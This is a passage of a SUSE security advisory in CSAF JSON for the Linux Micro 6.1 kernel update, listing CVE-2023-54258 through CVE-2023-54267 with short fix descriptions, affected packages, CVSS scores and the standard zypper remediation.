ffff97149147c000 R14: ffff97136944b188 R15: 0000000000000000\n[Fri Aug 4 04:12:50 2023] FS: 0000000000000000(0000) GS:ffff9714f7c00000(0000) knlGS:0000000000000000\n[Fri Aug 4 04:12:50 2023] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[Fri Aug 4 04:12:50 2023] CR2: 00007fd8de9c7590 CR3: 000000011228e000 CR4: 0000000000350ef0\n[Fri Aug 4 04:12:50 2023] Call Trace:\n[Fri Aug 4 04:12:50 2023] \u003cTASK\u003e\n[Fri Aug 4 04:12:50 2023] process_one_work+0x225/0x3d0\n[Fri Aug 4 04:12:50 2023] worker_thread+0x4d/0x3e0\n[Fri Aug 4 04:12:50 2023] ? process_one_work+0x3d0/0x3d0\n[Fri Aug 4 04:12:50 2023] kthread+0x12a/0x150\n[Fri Aug 4 04:12:50 2023] ? set_kthread_struct+0x50/0x50\n[Fri Aug 4 04:12:50 2023] ret_from_fork+0x22/0x30\n[Fri Aug 4 04:12:50 2023] \u003c/TASK\u003e\n\nTo fix this change the ordering of the checks before sending the oplock_response\nto first check if the openFileList is empty.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54258",
"url": "https://www.suse.com/security/cve/CVE-2023-54258"
},
{
"category": "external",
"summary": "SUSE Bug 1255886 for CVE-2023-54258",
"url": "https://bugzilla.suse.com/1255886"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54258"
},
{
"cve": "CVE-2023-54261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdkfd: Add missing gfx11 MQD manager callbacks\n\nmqd_stride function was introduced in commit 2f77b9a242a2\n(\"drm/amdkfd: Update MQD management on multi XCC setup\")\nbut not assigned for gfx11. Fixes a NULL dereference in debugfs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54261",
"url": "https://www.suse.com/security/cve/CVE-2023-54261"
},
{
"category": "external",
"summary": "SUSE Bug 1255879 for CVE-2023-54261",
"url": "https://bugzilla.suse.com/1255879"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54261"
},
{
"cve": "CVE-2023-54263",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54263"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/nouveau/kms/nv50-: init hpd_irq_lock for PIOR DP\n\nFixes OOPS on boards with ANX9805 DP encoders.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54263",
"url": "https://www.suse.com/security/cve/CVE-2023-54263"
},
{
"category": "external",
"summary": "SUSE Bug 1255883 for CVE-2023-54263",
"url": "https://bugzilla.suse.com/1255883"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54263"
},
{
"cve": "CVE-2023-54264",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54264"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/sysv: Null check to prevent null-ptr-deref bug\n\nsb_getblk(inode-\u003ei_sb, parent) return a null ptr and taking lock on\nthat leads to the null-ptr-deref bug.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54264",
"url": "https://www.suse.com/security/cve/CVE-2023-54264"
},
{
"category": "external",
"summary": "SUSE Bug 1255872 for CVE-2023-54264",
"url": "https://bugzilla.suse.com/1255872"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54264"
},
{
"cve": "CVE-2023-54266",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54266"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb: m920x: Fix a potential memory leak in m920x_i2c_xfer()\n\n\u0027read\u0027 is freed when it is known to be NULL, but not when a read error\noccurs.\n\nRevert the logic to avoid a small leak, should a m920x_read() call fail.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54266",
"url": "https://www.suse.com/security/cve/CVE-2023-54266"
},
{
"category": "external",
"summary": "SUSE Bug 1255875 for CVE-2023-54266",
"url": "https://bugzilla.suse.com/1255875"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54266"
},
{
"cve": "CVE-2023-54267",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54267"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/pseries: Rework lppaca_shared_proc() to avoid DEBUG_PREEMPT\n\nlppaca_shared_proc() takes a pointer to the lppaca which is typically\naccessed through get_lppaca(). With DEBUG_PREEMPT enabled, this leads\nto checking if preemption is enabled, for example:\n\n BUG: using smp_processor_id() in preemptible [00000000] code: grep/10693\n caller is lparcfg_data+0x408/0x19a0\n CPU: 4 PID: 10693 Comm: grep Not tainted 6.5.0-rc3 #2\n Call Trace:\n dump_stack_lvl+0x154/0x200 (unreliable)\n check_preemption_disabled+0x214/0x220\n lparcfg_data+0x408/0x19a0\n ...\n\nThis isn\u0027t actually a problem however, as it does not matter which\nlppaca is accessed, the shared proc state will be the same.\nvcpudispatch_stats_procfs_init() already works around this by disabling\npreemption, but the lparcfg code does not, erroring any time\n/proc/powerpc/lparcfg is accessed with DEBUG_PREEMPT enabled.\n\nInstead of disabling preemption on the caller side, rework\nlppaca_shared_proc() to not take a pointer and instead directly access\nthe lppaca, bypassing any potential preemption checks.\n\n[mpe: Rework to avoid needing a definition in paca.h and lppaca.h]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
